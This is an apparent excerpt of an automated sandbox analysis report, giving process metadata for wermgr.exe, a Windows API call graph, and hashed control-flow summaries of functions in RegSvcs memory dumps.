                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:08:46:27
                                                                Start date:22/10/2024
                                                                Path:C:\Windows\System32\wermgr.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4676" "1988" "2556" "2192" "0" "0" "2124" "0" "0" "0" "0" "0"
                                                                Imagebase:0x7ff6070d0000
                                                                File size:229'728 bytes
                                                                MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:10.4%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:184
                                                                  Total number of Limit Nodes:19
                                                                  execution_graph 38259 6043050 DuplicateHandle 38260 60430e6 38259->38260 38261 604d510 38262 604d578 CreateWindowExW 38261->38262 38264 604d634 38262->38264 38265 8ed030 38266 8ed048 38265->38266 38267 8ed0a2 38266->38267 38272 604d6b7 38266->38272 38276 604d6c8 38266->38276 38280 604e818 38266->38280 38289 604a46c 38266->38289 38273 604d6c5 38272->38273 38274 604a46c CallWindowProcW 38273->38274 38275 604d70f 38274->38275 38275->38267 38277 604d6ee 38276->38277 38278 604a46c CallWindowProcW 38277->38278 38279 604d70f 38278->38279 38279->38267 38283 604e855 38280->38283 38281 604e889 38314 604e49c 38281->38314 38283->38281 38284 604e879 38283->38284 38298 604ea7c 38284->38298 38304 604e9b0 38284->38304 38309 604e9a0 38284->38309 38285 604e887 38290 604a477 38289->38290 38291 604e889 38290->38291 38293 604e879 38290->38293 38292 604e49c CallWindowProcW 38291->38292 38294 604e887 38292->38294 38295 604e9a0 CallWindowProcW 38293->38295 38296 604e9b0 CallWindowProcW 38293->38296 38297 604ea7c CallWindowProcW 38293->38297 38294->38294 38295->38294 38296->38294 38297->38294 38299 604ea3a 38298->38299 38300 604ea8a 38298->38300 38318 604ea58 38299->38318 38322 604ea68 38299->38322 38301 604ea50 38301->38285 38305 604e9c4 38304->38305 38307 604ea58 CallWindowProcW 38305->38307 38308 604ea68 CallWindowProcW 38305->38308 38306 604ea50 38306->38285 38307->38306 38308->38306 38311 604e9b1 38309->38311 38310 604ea50 38310->38285 38312 604ea58 CallWindowProcW 38311->38312 38313 604ea68 CallWindowProcW 38311->38313 38312->38310 38313->38310 38315 604e4a7 38314->38315 38316 604fcea CallWindowProcW 38315->38316 38317 604fc99 38315->38317 38316->38317 38317->38285 38319 604ea68 38318->38319 38321 604ea79 38319->38321 38325 604fc30 38319->38325 38321->38301 38323 604ea79 38322->38323 38324 604fc30 CallWindowProcW 38322->38324 38323->38301 38324->38323 38326 604e49c CallWindowProcW 38325->38326 38327 604fc3a 38326->38327 38327->38321 38328 970848 38330 97084e 38328->38330 38329 97091b 38330->38329 38335 6041cf0 38330->38335 38339 6041d00 38330->38339 38343 6041d82 38330->38343 38349 971380 38330->38349 38336 6041cfe 38335->38336 38353 6041494 38336->38353 38340 6041d0f 38339->38340 38341 6041494 3 API calls 38340->38341 38342 6041d30 38341->38342 38342->38330 38344 6041cfe 38343->38344 38348 6041d8a 38343->38348 38345 6041d57 38344->38345 38346 6041494 3 API calls 38344->38346 38345->38330 38347 6041d30 38346->38347 38347->38330 38348->38330 38351 97138b 38349->38351 38350 971480 38350->38330 38351->38350 38472 977ea8 38351->38472 38354 604149f 38353->38354 38357 6042bf4 38354->38357 38356 60436b6 38356->38356 38358 6042bff 38357->38358 38359 6043ddc 38358->38359 38362 6045a67 38358->38362 38366 6045a68 38358->38366 38359->38356 38364 6045a89 38362->38364 38363 6045aad 38363->38359 38364->38363 38370 6045c18 38364->38370 38367 6045a89 38366->38367 38368 6045aad 38367->38368 38369 6045c18 3 API calls 38367->38369 38368->38359 38369->38368 38371 6045c25 38370->38371 38372 6045c5e 38371->38372 38374 6044dc8 38371->38374 38372->38363 38375 6044dd3 38374->38375 38377 6045cd0 38375->38377 38378 6044dfc 38375->38378 38377->38377 38379 6044e07 38378->38379 38385 6044e0c 38379->38385 38381 6045d3f 38389 604b060 38381->38389 38398 604b048 38381->38398 38382 6045d79 38382->38377 38386 6044e17 38385->38386 38387 6046ee0 38386->38387 38388 6045a68 3 API calls 38386->38388 38387->38381 38388->38387 38391 604b091 38389->38391 38393 604b191 38389->38393 38390 604b09d 38390->38382 38391->38390 38407 604b2c8 38391->38407 38411 604b2d8 38391->38411 38392 604b0dd 38415 604c5d8 38392->38415 38425 604c5c9 38392->38425 38393->38382 38400 604b091 38398->38400 38401 604b191 38398->38401 38399 604b09d 38399->38382 38400->38399 38405 604b2c8 3 API calls 38400->38405 38406 604b2d8 3 API calls 38400->38406 38401->38382 38402 604b0dd 38403 604c5d8 GetModuleHandleW 38402->38403 38404 604c5c9 GetModuleHandleW 38402->38404 38403->38401 38404->38401 38405->38402 38406->38402 38435 604b318 38407->38435 38444 604b328 38407->38444 38408 604b2e2 38408->38392 38412 604b2e2 38411->38412 38413 604b318 2 API calls 38411->38413 38414 604b328 2 API calls 38411->38414 38412->38392 38413->38412 38414->38412 38416 604c603 38415->38416 38453 604a35c 38416->38453 38419 604c686 38421 604c6b2 38419->38421 38468 604a28c 38419->38468 38424 604a35c GetModuleHandleW 38424->38419 38426 604c603 38425->38426 38427 604a35c GetModuleHandleW 38426->38427 38428 604c66a 38427->38428 38432 604ca90 GetModuleHandleW 38428->38432 38433 604cb40 GetModuleHandleW 38428->38433 38434 604a35c GetModuleHandleW 38428->38434 38429 604c686 38430 604c6b2 38429->38430 38431 604a28c GetModuleHandleW 38429->38431 38430->38430 38431->38430 38432->38429 38433->38429 38434->38429 38436 604b31d 38435->38436 38437 604a28c GetModuleHandleW 38436->38437 38439 604b35c 38436->38439 38438 604b344 38437->38438 38438->38439 38443 604b5b2 GetModuleHandleW 38438->38443 38439->38408 38440 604b354 38440->38439 38441 604b560 GetModuleHandleW 38440->38441 38442 604b58d 38441->38442 38442->38408 38443->38440 38445 604b339 38444->38445 38448 604b35c 38444->38448 38446 604a28c GetModuleHandleW 38445->38446 38447 604b344 38446->38447 38447->38448 38452 604b5b2 GetModuleHandleW 38447->38452 38448->38408 38449 604b560 GetModuleHandleW 38451 604b58d 38449->38451 38450 604b354 38450->38448 38450->38449 38451->38408 38452->38450 38454 604a367 38453->38454 38455 604c66a 38454->38455 38456 604cca0 GetModuleHandleW 38454->38456 38457 604ccb0 GetModuleHandleW 38454->38457 38455->38424 38458 604cb40 38455->38458 38463 604ca90 38455->38463 38456->38455 38457->38455 38459 604cb6d 38458->38459 38460 604cbee 38459->38460 38461 604cca0 GetModuleHandleW 38459->38461 38462 604ccb0 GetModuleHandleW 38459->38462 38461->38460 38462->38460 38464 604caa0 38463->38464 38465 604caab 38464->38465 38466 604cca0 GetModuleHandleW 38464->38466 38467 604ccb0 GetModuleHandleW 38464->38467 38465->38419 38466->38465 38467->38465 38470 604b518 GetModuleHandleW 38468->38470 38471 604b58d 38470->38471 38471->38421 38473 977eb2 38472->38473 38474 977ecc 38473->38474 38477 605faa9 38473->38477 38481 605fab8 38473->38481 38474->38351 38479 605fab8 38477->38479 38478 605fce2 38478->38474 38479->38478 38480 605fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 38479->38480 38480->38479 38483 605facd 38481->38483 38482 605fce2 38482->38474 38483->38482 38484 605fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 38483->38484 38484->38483

                                                                  Executed Functions

                                                                  Function 06053100 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 657 6053100-6053121 658 6053123-6053126 657->658 659 605314c-605314f 658->659 660 6053128-6053147 658->660 661 6053155-6053174 659->661 662 60538f0-60538f2 659->662 660->659 670 6053176-6053179 661->670 671 605318d-6053197 661->671 664 60538f4 662->664 665 60538f9-60538fc 662->665 664->665 665->658 666 6053902-605390b 665->666 670->671 672 605317b-605318b 670->672 674 605319d-60531ac 671->674 672->674 783 60531ae call 6053920 674->783 784 60531ae call 6053918 674->784 676 60531b3-60531b8 677 60531c5-60534a2 676->677 678 60531ba-60531c0 676->678 699 60538e2-60538ef 677->699 700 60534a8-6053557 677->700 678->666 709 6053580 700->709 710 6053559-605357e 700->710 712 6053589-605359c 709->712 710->712 714 60535a2-60535c4 712->714 715 60538c9-60538d5 712->715 714->715 718 60535ca-60535d4 714->718 715->700 716 60538db 715->716 716->699 718->715 719 60535da-60535e5 718->719 719->715 720 60535eb-60536c1 719->720 732 60536c3-60536c5 720->732 733 60536cf-60536ff 720->733 732->733 737 6053701-6053703 733->737 738 605370d-6053719 733->738 737->738 739 6053779-605377d 738->739 740 605371b-605371f 738->740 741 6053783-60537bf 739->741 742 60538ba-60538c3 739->742 740->739 743 6053721-605374b 740->743 753 60537c1-60537c3 741->753 754 60537cd-60537db 741->754 742->715 742->720 750 605374d-605374f 743->750 751 6053759-6053776 743->751 750->751 751->739 753->754 757 60537f2-60537fd 754->757 758 60537dd-60537e8 754->758 761 6053815-6053826 757->761 762 60537ff-6053805 757->762 758->757 763 60537ea 758->763 767 605383e-605384a 761->767 768 6053828-605382e 761->768 764 6053807 762->764 765 6053809-605380b 762->765 763->757 764->761 765->761 772 6053862-60538b3 767->772 773 605384c-6053852 767->773 769 6053830 768->769 770 6053832-6053834 768->770 769->767 770->767 772->742 774 6053854 773->774 775 6053856-6053858 773->775 774->772 775->772 783->676 784->676
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3356825164
                                                                  • Opcode ID: 24c59835d6420de3963328f68d3bc23527e79288c0c13fa8d9431014366f3a3c
                                                                  • Instruction ID: 289bd164b2e67df206e3492af3f83574f5e9d478457375d0f5cc882377535a98
                                                                  • Opcode Fuzzy Hash: 24c59835d6420de3963328f68d3bc23527e79288c0c13fa8d9431014366f3a3c
                                                                  • Instruction Fuzzy Hash: 2A324D31E10719CFCB58EF65C8946AEB7B2FFC9300F11C6A9D409A7264EB70A985CB51
                                                                  Function 06057DF0 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1326 6057df0-6057e0e 1327 6057e10-6057e13 1326->1327 1328 6057e15-6057e2f 1327->1328 1329 6057e34-6057e37 1327->1329 1328->1329 1331 6057e44-6057e47 1329->1331 1332 6057e38-6057e43 1329->1332 1334 6057e5e-6057e61 1331->1334 1335 6057e49-6057e57 1331->1335 1336 6057e84-6057e86 1334->1336 1337 6057e63-6057e7f 1334->1337 1343 6057e96-6057eac 1335->1343 1344 6057e59 1335->1344 1339 6057e8d-6057e90 1336->1339 1340 6057e88 1336->1340 1337->1336 1339->1327 1339->1343 1340->1339 1347 60580c7-60580d1 1343->1347 1348 6057eb2-6057ebb 1343->1348 1344->1334 1349 6057ec1-6057ede 1348->1349 1350 60580d2-6058107 1348->1350 1357 60580b4-60580c1 1349->1357 1358 6057ee4-6057f0c 1349->1358 1353 6058109-605810c 1350->1353 1355 6058341-6058344 1353->1355 1356 6058112-6058121 1353->1356 1359 6058367-605836a 1355->1359 1360 6058346-6058362 1355->1360 1368 6058140-6058184 1356->1368 1369 6058123-605813e 1356->1369 1357->1347 1357->1348 1358->1357 1378 6057f12-6057f1b 1358->1378 1361 6058415-6058417 1359->1361 1362 6058370-605837c 1359->1362 1360->1359 1365 605841e-6058421 1361->1365 1366 6058419 1361->1366 1371 6058387-6058389 1362->1371 1365->1353 1370 6058427-6058430 1365->1370 1366->1365 1383 6058315-605832b 1368->1383 1384 605818a-605819b 1368->1384 1369->1368 1374 60583a1-60583a5 1371->1374 1375 605838b-6058391 1371->1375 1381 60583a7-60583b1 1374->1381 1382 60583b3 1374->1382 1379 6058395-6058397 1375->1379 1380 6058393 1375->1380 1378->1350 1386 6057f21-6057f3d 1378->1386 1379->1374 1380->1374 1385 60583b8-60583ba 1381->1385 1382->1385 1383->1355 1392 60581a1-60581be 1384->1392 1393 6058300-605830f 1384->1393 1390 60583bc-60583bf 1385->1390 1391 60583cb-6058404 1385->1391 1397 6057f43-6057f6d 1386->1397 1398 60580a2-60580ae 1386->1398 1390->1370 1391->1356 1412 605840a-6058414 1391->1412 1392->1393 1404 60581c4-60582ba call 6056618 1392->1404 1393->1383 1393->1384 1410 6057f73-6057f9b 1397->1410 1411 6058098-605809d 1397->1411 1398->1357 1398->1378 1460 60582bc-60582c6 1404->1460 1461 60582c8 1404->1461 1410->1411 1418 6057fa1-6057fcf 1410->1418 1411->1398 1418->1411 1424 6057fd5-6057fde 1418->1424 1424->1411 1426 6057fe4-6058016 1424->1426 1433 6058021-605803d 1426->1433 1434 6058018-605801c 1426->1434 1433->1398 1436 605803f-6058096 call 6056618 1433->1436 1434->1411 1435 605801e 1434->1435 1435->1433 1436->1398 1462 60582cd-60582cf 1460->1462 1461->1462 1462->1393 1463 60582d1-60582d6 1462->1463 1464 60582e4 1463->1464 1465 60582d8-60582e2 1463->1465 1466 60582e9-60582eb 1464->1466 1465->1466 1466->1393 1467 60582ed-60582f9 1466->1467 1467->1393
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq
                                                                  • API String ID: 0-3720491408
                                                                  • Opcode ID: 7e6e256c95655a6a546b8b3a6e89c7304df81e6db1df5656fba5f3ce9b4ff3ff
                                                                  • Instruction ID: bf9cdf0f664f78a137dab1b5fdc5a8e3a9d0b2df353333e57848c5c190dd7c8b
                                                                  • Opcode Fuzzy Hash: 7e6e256c95655a6a546b8b3a6e89c7304df81e6db1df5656fba5f3ce9b4ff3ff
                                                                  • Instruction Fuzzy Hash: 2B02BE31B002158FCB94DB69D594AAEBBF6FF84300F11C529D8059B399EB35ED86CB80
                                                                  Function 0097E270 Relevance: 2.8, Strings: 2, Instructions: 337COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1601 97e270-97e292 1602 97e2f6-97e2fd 1601->1602 1603 97e294-97e2bf 1601->1603 1608 97e2c6-97e2d3 1603->1608 1610 97e2d5-97e2ee 1608->1610 1611 97e2fe-97e365 1608->1611 1610->1602 1621 97e367-97e369 1611->1621 1622 97e36e-97e37e 1611->1622 1623 97e60d-97e614 1621->1623 1624 97e385-97e395 1622->1624 1625 97e380 1622->1625 1627 97e5f4-97e602 1624->1627 1628 97e39b-97e3a9 1624->1628 1625->1623 1631 97e615-97e68e 1627->1631 1633 97e604-97e608 call 977b10 1627->1633 1628->1631 1632 97e3af 1628->1632 1632->1631 1634 97e3b6-97e3c8 1632->1634 1635 97e3f3-97e415 1632->1635 1636 97e4b2-97e4da 1632->1636 1637 97e4df-97e507 1632->1637 1638 97e41a-97e43b 1632->1638 1639 97e579-97e5a5 1632->1639 1640 97e5a7-97e5c2 call 970350 1632->1640 1641 97e466-97e487 1632->1641 1642 97e5c4-97e5e6 1632->1642 1643 97e440-97e461 1632->1643 1644 97e54e-97e574 1632->1644 1645 97e3cd-97e3ee 1632->1645 1646 97e48c-97e4ad 1632->1646 1647 97e50c-97e549 1632->1647 1648 97e5e8-97e5f2 1632->1648 1633->1623 1634->1623 1635->1623 1636->1623 1637->1623 1638->1623 1639->1623 1640->1623 1641->1623 1642->1623 1643->1623 1644->1623 1645->1623 1646->1623 1647->1623 1648->1623
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Xnq$$jq
                                                                  • API String ID: 0-65531410
                                                                  • Opcode ID: 7079d57cdd425bfbe34defa187ffbfe5b5e4f010d902e2405849d935ac2d104c
                                                                  • Instruction ID: 1c9168a79370e0067ad5a3ffb5577878e1f5986d2aa6f2f364df8748c58935d0
                                                                  • Opcode Fuzzy Hash: 7079d57cdd425bfbe34defa187ffbfe5b5e4f010d902e2405849d935ac2d104c
                                                                  • Instruction Fuzzy Hash: D0B1C531B042189FDB18AB79985567E7BA7BFC8700B14C96ED40BD7399DE38DC028B91
                                                                  Function 0097AA12 Relevance: 2.8, Instructions: 2762COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d8b00a733d1a754dc1ad6a1818fbbaa380d53cded15d4a15c626f67511a3fbd
                                                                  • Instruction ID: 72615a6c6b047df7b671877a0eb004d3237034b7b3d3aa0ecff213182e2ff03d
                                                                  • Opcode Fuzzy Hash: 2d8b00a733d1a754dc1ad6a1818fbbaa380d53cded15d4a15c626f67511a3fbd
                                                                  • Instruction Fuzzy Hash: 2353E571D10B1A8ACB51EF68C8846A9F7B1FF99300F51D79AE45877121FB70AAC4CB81
                                                                  Function 06052409 Relevance: 1.0, Instructions: 1011COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e752bc9da3cb93cbb4831124d953d1712f6fd1edb94a99ef08ac5420fc621ca1
                                                                  • Instruction ID: 8331ec78776c437512c7ff120fb3fed0e944125d3ba0955357ab053fe5b2833a
                                                                  • Opcode Fuzzy Hash: e752bc9da3cb93cbb4831124d953d1712f6fd1edb94a99ef08ac5420fc621ca1
                                                                  • Instruction Fuzzy Hash: 3F922734A002048FDBA4DF68C584A6EBBF2EF45314F5684A9D849EB365DB35ED85CF80
                                                                  Function 06056668 Relevance: .8, Instructions: 815COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 292e7887ed641d031237a79403f4f6b1ebf2303548d2b154fde3c26c9d8138cf
                                                                  • Instruction ID: 13c9909bafc7ad2f8f2beb06ec7f8a2b3a6d0dbb60c008fec5a662f33c29bb22
                                                                  • Opcode Fuzzy Hash: 292e7887ed641d031237a79403f4f6b1ebf2303548d2b154fde3c26c9d8138cf
                                                                  • Instruction Fuzzy Hash: 4C62AE35E102088FDB94DB68D584AAEBBF6EF88310F558569E805DB364DB36ED41CB80
                                                                  Function 0605C200 Relevance: .6, Instructions: 639COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 342c9a0bae074e9af4f679cced44188dc6cabd558078ee0d5201c1879661ecad
                                                                  • Instruction ID: aad7ca2ee2d4300f4832d1107ccaff3309625365ae26f6327caaf80d011edbb4
                                                                  • Opcode Fuzzy Hash: 342c9a0bae074e9af4f679cced44188dc6cabd558078ee0d5201c1879661ecad
                                                                  • Instruction Fuzzy Hash: 46329335A502098FEF94DB68D580BAEBBF6EF88314F118529E805E7355DB34EC81CB91
                                                                  Function 06055640 Relevance: .6, Instructions: 587COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e24e942740715ea5eb890fffdf4a15459f6e01b224cc2d415ef42211bf2c0462
                                                                  • Instruction ID: 930ab80e589c47718e776133566aec05aff7afe0721338d7bb11f31bc87b3480
                                                                  • Opcode Fuzzy Hash: e24e942740715ea5eb890fffdf4a15459f6e01b224cc2d415ef42211bf2c0462
                                                                  • Instruction Fuzzy Hash: 1612C171F402058BDFA1DB64D88066FBBF6EF84320F258429D85A9B395DB34ED41CB91
                                                                  Function 0605B2A2 Relevance: .6, Instructions: 563COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd0588e3ada1dcae60282123c2aaf9611af198a94d3a2c56a042b37d8b9bbc63
                                                                  • Instruction ID: b4b5f847ac4e05152c400f4240d579d9a5d8650e2dcedefe38456fd0eb425aa2
                                                                  • Opcode Fuzzy Hash: bd0588e3ada1dcae60282123c2aaf9611af198a94d3a2c56a042b37d8b9bbc63
                                                                  • Instruction Fuzzy Hash: 39227070E502098FDFA4DB68D5A07AEBBF5EB45310F218926E805D7395DB34EC81CB51
                                                                  Function 00974A98 Relevance: .3, Instructions: 266COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c4c4d711ee8e62c6a4064515df7ea32f98ebbcd185c44dc13a9cda604eecc8c
                                                                  • Instruction ID: d4d3bbba3a1446d592aef8623314b8a26feeeee1b4b070d943912f44ba9fbc60
                                                                  • Opcode Fuzzy Hash: 2c4c4d711ee8e62c6a4064515df7ea32f98ebbcd185c44dc13a9cda604eecc8c
                                                                  • Instruction Fuzzy Hash: 69B15D71E002098FDB20CFA9C9857EDBBF6AF88314F14C529D459E7295EB749845CB81
                                                                  Function 00973E80 Relevance: .2, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75730f30da9bfd3f44066a463d6122042cbab15029cfcac98b31b554c58ebbc6
                                                                  • Instruction ID: 3128e6ab5b264e6a483c3eabcb287b14daa35d3cdd822d601ce2d93802c31a22
                                                                  • Opcode Fuzzy Hash: 75730f30da9bfd3f44066a463d6122042cbab15029cfcac98b31b554c58ebbc6
                                                                  • Instruction Fuzzy Hash: D3917B71E00209CFDF10DFA9C9857AEBBF6BF98304F14C129E419A7294EB749985CB81
                                                                  Function 0605AD48 Relevance: 10.4, Strings: 8, Instructions: 394COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 527 605ad48-605ad66 528 605ad68-605ad6b 527->528 529 605ad6d-605ad89 528->529 530 605ad8e-605ad91 528->530 529->530 531 605ada1-605ada4 530->531 532 605ad93-605ad9c 530->532 533 605adb5-605adb8 531->533 534 605ada6-605adaa 531->534 532->531 538 605adcc-605adcf 533->538 539 605adba-605adc7 533->539 536 605af74-605af7e 534->536 537 605adb0 534->537 537->533 541 605add1-605adda 538->541 542 605ade9-605adec 538->542 539->538 544 605ade0-605ade4 541->544 545 605af7f-605af87 541->545 546 605adf6-605adf9 542->546 547 605adee-605adf3 542->547 544->542 553 605af88 545->553 548 605ae13-605ae16 546->548 549 605adfb-605ae0e 546->549 547->546 550 605af65-605af6e 548->550 551 605ae1c-605ae1e 548->551 549->548 550->536 550->541 555 605ae25-605ae28 551->555 556 605ae20 551->556 557 605b005 553->557 558 605af89 553->558 555->528 559 605ae2e-605ae52 555->559 556->555 560 605b007-605b042 557->560 558->553 561 605af8a-605af8b 558->561 573 605af62 559->573 574 605ae58-605ae67 559->574 566 605b235-605b248 560->566 567 605b048-605b054 560->567 562 605af90 561->562 562->562 565 605af93-605afb6 562->565 568 605afb8-605afbb 565->568 572 605b24a 566->572 578 605b074-605b0b8 567->578 579 605b056-605b06f 567->579 570 605afbd-605afd9 568->570 571 605afde-605afe1 568->571 570->571 576 605afe3-605afe7 571->576 577 605afee-605aff1 571->577 581 605b26a-605b26d 572->581 573->550 588 605ae7f-605aeba call 6056618 574->588 589 605ae69-605ae6f 574->589 576->560 582 605afe9 576->582 584 605aff3-605affd 577->584 585 605affe-605b001 577->585 607 605b0d4-605b113 578->607 608 605b0ba-605b0cc 578->608 579->572 586 605b27c-605b27e 581->586 587 605b26f call 605b2a2 581->587 582->577 585->557 585->581 594 605b285-605b288 586->594 595 605b280 586->595 598 605b275-605b277 587->598 610 605aed2-605aee9 588->610 611 605aebc-605aec2 588->611 590 605ae71 589->590 591 605ae73-605ae75 589->591 590->588 591->588 594->568 596 605b28e-605b298 594->596 595->594 598->586 617 605b119-605b1f4 call 6056618 607->617 618 605b1fa-605b20f 607->618 608->607 624 605af01-605af12 610->624 625 605aeeb-605aef1 610->625 614 605aec4 611->614 615 605aec6-605aec8 611->615 614->610 615->610 617->618 618->566 631 605af14-605af1a 624->631 632 605af2a-605af5b 624->632 627 605aef5-605aef7 625->627 628 605aef3 625->628 627->624 628->624 633 605af1c 631->633 634 605af1e-605af20 631->634 632->573 633->632 634->632
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-666546452
                                                                  • Opcode ID: 76a9be8c792f63c1262703e65833027b80437a25b2add6b7aae87d55221acf44
                                                                  • Instruction ID: 9b0e3cb2bc07dc9bb60e38d1a541ebdf237c1eeccd9881c3166e6cfea7072737
                                                                  • Opcode Fuzzy Hash: 76a9be8c792f63c1262703e65833027b80437a25b2add6b7aae87d55221acf44
                                                                  • Instruction Fuzzy Hash: 08E16F30F502098FCB95DFA9D5506AEBBF6EF85300F118629E815AB355DB34EC45CB90
                                                                  Function 0605B6C8 Relevance: 8.0, Strings: 6, Instructions: 469COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
